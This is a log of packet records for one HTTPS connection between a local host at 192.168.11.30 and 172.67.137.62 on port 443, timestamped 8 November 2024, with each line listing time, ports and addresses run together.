                                                                                                                          Nov 8, 2024 10:59:43.010879993 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.010885954 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.011100054 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.012022972 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.012284994 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.012295008 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.051862001 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.251410007 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.251440048 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.251652956 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.251673937 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.251739025 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.251830101 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.252985001 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.253102064 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.253127098 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.253192902 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.253199100 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.253295898 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.253493071 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.254679918 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.254700899 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.254869938 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.254878044 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.254918098 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.254966021 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.255157948 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.256510973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.256525993 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.256664991 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.256834984 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.256839991 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.257039070 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.258472919 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.258487940 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.258627892 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.258706093 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.258711100 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.258888006 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.259373903 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.259553909 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.259553909 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.259563923 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.260349035 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.260550022 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.260550976 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.260559082 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.260657072 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.260746956 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.262188911 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.262207985 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.262346983 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.262392044 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.262396097 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.262445927 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.262447119 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.262581110 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.264142990 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.264157057 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.264309883 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.264425039 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.264431000 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.264597893 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.264605999 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.264612913 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.264801025 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.500574112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.500580072 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.500674009 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.500811100 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.500821114 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.500938892 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.500984907 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.502336025 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.502346039 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.502536058 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.502542973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.502651930 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.502728939 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.504137993 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.504148006 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.504369974 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.504379988 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.504385948 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.504466057 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.504575014 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.505974054 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.505984068 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.506189108 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.506195068 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.506346941 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.508021116 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.508030891 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.508439064 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.508446932 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.508636951 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.509761095 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.509768963 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.509948015 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.509948015 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.509954929 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.510046005 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.510140896 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.510205984 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.511379004 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.511508942 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.511544943 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.511610985 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.511614084 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.511820078 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.513302088 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.513406992 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.513498068 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.513623953 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.513629913 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.514453888 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.514462948 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.514741898 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.514748096 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.514820099 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.516931057 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.516941071 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.517115116 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.517121077 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.517199993 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.517292976 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.518090963 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.518253088 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.518316984 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.518435001 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.518440008 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.518604040 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.748605013 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.748724937 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.748869896 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.748878956 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.748943090 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.750435114 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.750443935 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.750686884 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.750695944 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.750768900 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.751127958 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.752084970 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.752094030 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.752263069 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.752351046 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.752357006 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.752402067 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.753998995 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.754009008 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.754139900 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.754163027 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.754339933 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.755575895 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.755832911 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.755841970 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.756050110 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.756928921 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.756938934 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.757144928 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.757164955 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.757368088 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.758712053 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.758722067 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.758891106 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.759059906 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.759068966 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.759294033 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.760958910 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.760970116 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.761218071 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.761228085 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.761261940 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.761480093 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.762849092 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.762856960 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.763142109 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.763151884 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.763242960 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.763494015 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.763518095 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.763801098 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.764194012 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.764337063 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.764369011 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.764625072 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.764633894 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.766541958 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.766550064 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.766885042 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.766894102 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.767029047 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.768213987 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.768222094 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.768589973 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.768599987 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.770070076 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.770077944 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.770241022 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.770250082 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.770318985 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.770575047 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.770808935 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.770972967 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.771073103 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.771081924 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.771361113 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.998475075 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.998490095 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.998656034 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.998759985 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.998769045 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:43.998823881 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:43.998992920 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.000161886 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.000173092 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.000329018 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.000392914 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.000399113 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.000413895 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.000564098 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.002425909 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.002434969 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.002778053 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.002787113 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.003050089 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.003905058 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.003916025 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.004117012 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.004117012 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.004127026 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.004336119 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.004426003 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.006093979 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.006103992 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.006337881 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.006346941 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.006444931 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.006647110 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.007548094 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.007558107 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.007740974 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.007740974 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.007909060 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.007915974 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.008090973 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.009330034 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.009354115 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.009511948 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.009628057 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.009637117 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.009821892 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.011079073 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.011086941 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.011255980 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.011353970 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.011358976 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.011641979 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.013114929 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.013123035 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.013441086 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.013449907 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.013670921 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.015010118 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.015017986 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.015204906 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.015258074 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.015266895 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.015348911 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.015577078 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.016577005 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.016585112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.016712904 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.016769886 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.016769886 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.016818047 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.016818047 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.016824007 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.017076969 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.018424988 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.018433094 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.018794060 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.018802881 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.020569086 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.020579100 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.020809889 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.020818949 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.020895004 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.022890091 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.022897959 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.023076057 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.023086071 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.023102999 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.023196936 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.023969889 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.024070024 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.024123907 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.024184942 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.024189949 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.024276018 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.024499893 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.025723934 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.025732994 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.025928974 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.025969982 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.026138067 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.026245117 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.026518106 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.026774883 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:44.246978045 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:44.247052908 CET44349754172.67.137.62192.168.11.30
